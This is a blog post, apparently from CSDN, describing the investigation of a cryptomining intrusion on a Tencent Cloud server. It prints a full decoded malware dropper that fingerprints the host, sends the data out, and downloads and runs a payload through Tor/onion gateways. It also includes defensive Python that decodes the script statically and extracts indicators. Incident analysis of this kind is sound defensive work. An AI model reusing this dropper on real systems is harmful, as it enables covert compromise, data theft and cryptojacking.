Tencent Cloud intrusion


    Around 8 a.m. I received an SMS alert from Tencent Cloud warning that the machine might be at risk of cryptomining. I logged in right away and found a rather strange crontab entry:

    [dev@VM_0_12_centos ~]$ crontab -l
    11 * * * * /home/dev/.config/systemd/user/systemd-tmpfiles-cleanup/systemd-tmpfiles-cleanup-z3glwn.sh > /dev/null 2>&1 &
    
    [dev@VM_0_12_centos ~]$ cd .config/
    [dev@VM_0_12_centos .config]$ ll
    total 20
    drwxrwxr-x  5 dev dev 4096 Jun 20 06:08 .
    drwx------ 15 dev dev 4096 Jun  8 19:55 ..
    drwxrwxr-x  2 dev dev 4096 Apr 30  2020 abrt
    drwxrwxr-x  2 dev dev 4096 May 27  2020 jgit
    drwxrwxr-x  3 dev dev 4096 Jun 20 06:08 systemd    <- this timestamp is abnormal; Tencent Cloud sent the SMS at 8 o'clock
    

    Then I went to the task's script to see what it actually executes:

    [dev@VM_0_12_centos systemd-tmpfiles-cleanup]$ cat systemd-tmpfiles-cleanup-z3glwn.sh 
    #!/bin/bash
    exec &>/dev/null
    echo z3glwn
    echo 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|base64 -d|bash
    

    Base64-decoding the echo payload above yields the following script:

    z3glwn
    exec &>/dev/null
    BDrFYzWg=./.$(date|md5sum|head -c20)
    qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
    sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-systemd-logind.service-z3glwn"
    GRPoNTxD="curl -m60 -fsSLkA- --doh-url https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
    ZwJtGQaC="curl -m60 -fsSLkA-"
    HNPDsmwz="relay.tor2socks.in"
    HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
    PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH
    
    eGiAsomX() {
    	read proto server path <<<$(echo ${1 })
    	DOC=/${path// //}
    	HOST=${server//:*}
    	PORT=${server//*:}
    	[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    	exec 3<>/dev/tcp/${HOST}/$PORT
    	echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3
    	(while read line; do
    	[[ "$line" == $'\r' ]] && break
    	done && cat) <&3
    	exec 3>&-
    }
    
    bCQYhArV() {
    	for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
    }
    
    XNSBjYOO() {
    	HoVCQHFu=/exec
    	LouMQEck=cr0_$(curl -s4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1)
    	$GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
    }
    
    MPQKanDg() {
    	chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
    }
    
    dtOFCAtT() {
    	u=$HyMbvhNq.tor2web.it/load/
    	cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
    	bCQYhArV
    	XNSBjYOO $HyMbvhNq.tor2web.it ||
    	XNSBjYOO $HyMbvhNq.tor2web.in ||
    	XNSBjYOO $HyMbvhNq.tor2web.re
    	MPQKanDg
    }
    
    ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT
    
    
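The dropper above follows a recognisable pattern: a cron job in a hidden `~/.config` path with a systemd-like name, all output discarded, and `echo <base64> | base64 -d | bash` fetching a second stage over DoH and Tor gateways. The following is an added example (not from the original post) showing how a defender can triage `crontab -l` output and statically unpack such a payload to collect indicators without executing it; the cron line is the one from the post, while the dropper and second stage are constructed stand-ins with placeholder hostnames.

```python
"""Triage crontab entries and statically unpack a base64 dropper (constructed sample)."""
import base64
import re

# Heuristics a defender would apply to each line of `crontab -l` output.
SUSPICIOUS = [
    (r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh", "base64-decoded payload piped to a shell"),
    (r">\s*/dev/null\s+2>&1", "all output discarded"),
    (r"/\.[A-Za-z0-9_.-]+/", "script lives in a hidden directory"),
    (r"systemd-tmpfiles|systemd-private", "impersonates a systemd path name"),
]

def triage_cron_line(line):
    """Return the descriptions of every heuristic that matches one crontab line."""
    return [why for pat, why in SUSPICIOUS if re.search(pat, line)]

def decode_echo_stage(script_text):
    """Locate `echo <b64> | base64 -d | bash` in a dropper and return the decoded stage, else None."""
    m = re.search(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*\|\s*bash", script_text)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", "replace")

def extract_iocs(stage_text):
    """Pull network indicators out of decoded stage text for blocklisting; nothing is run."""
    return {
        "onion": sorted(set(re.findall(r"\b[a-z2-7]{16,56}\.onion\b", stage_text))),
        "hosts": sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", stage_text))),
        "dev_tcp": bool(re.search(r"/dev/tcp/", stage_text)),  # bash raw-socket fallback
    }

# Constructed second stage modelled on the decoded script above (placeholder hosts, not real IoCs).
STAGE2 = ("exec &>/dev/null\n"
          "c=\"curl -m60 -fsSLkA- --doh-url https://doh.example.test/dns-query\"\n"
          "exec 3<>/dev/tcp/${HOST}/$PORT\n"
          "$c -x socks5h://relay.example.test:9050 "
          + "a" * 56 + ".onion/exec -o./.x\n")
# Constructed dropper wrapping STAGE2 the same way the post's systemd-tmpfiles-cleanup-*.sh does.
DROPPER = ("#!/bin/bash\nexec &>/dev/null\necho "
           + base64.b64encode(STAGE2.encode()).decode() + "|base64 -d|bash\n")
# The crontab line seen on the compromised host.
CRON_LINE = ("11 * * * * /home/dev/.config/systemd/user/systemd-tmpfiles-cleanup/"
             "systemd-tmpfiles-cleanup-z3glwn.sh > /dev/null 2>&1 &")

if __name__ == "__main__":
    print(triage_cron_line(CRON_LINE))
    print(extract_iocs(decode_echo_stage(DROPPER)))
```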

    Without a thorough investigation, my first step was simply to stop the task from running, but later I found that the crontab task had started up again. The running process can be located by its PID, so I stopped that as well:

    [dev@VM_0_12_centos .config]$ ps -ef | grep 6QTAv88
    dev      1996782       1  0 06:06 ?        00:00:00 6QTAv88
    dev      2069016 2063681  0 09:55 pts/3    00:00:00 grep --color=auto 6QTAv88
    

    The only services running as the dev user are RocketMQ and ES; Redis runs as root and can be ruled out. The entry point can be roughly pinned down to the script execution vulnerability in the ES console:
    http://www.hzhcontrols.com/new-569680.html

  Original article: https://blog.csdn.net/oDeviloo/article/details/131300330